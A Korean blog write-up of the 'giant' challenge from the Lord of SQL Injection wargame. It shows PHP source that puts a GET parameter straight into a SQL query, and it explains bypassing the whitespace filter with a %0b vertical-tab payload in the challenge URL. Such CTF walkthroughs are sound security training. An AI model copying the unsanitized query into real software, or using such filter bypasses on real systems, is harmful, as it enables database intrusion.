[LOS] glant 풀이
PHP & query
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>select 1234 from
prob_giant where 1
문제 풀이
더보기
solve 조건
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
if($result[1234]) solve("giant"); $_GET[shit] 부분이 공백이면 풀린다
특수문자 제약
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
|\n|\r|\t 를 필터링 하고 있다. %0b로 우회한다
URL
los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit=%0b
'CTF > LOS' 카테고리의 다른 글
| [LOS] succubus 풀이 -16번 (0) | 2020.09.17 |
|---|---|
| [LOS] assassin 풀이 - 15번 (0) | 2020.09.16 |
| [LOS] bugbear 풀이 - 13번 (0) | 2020.09.16 |
| [LOS] darkknight 풀이 - 12번 (0) | 2020.09.16 |
| [LOS] golem 풀이 - 11번 (0) | 2020.09.16 |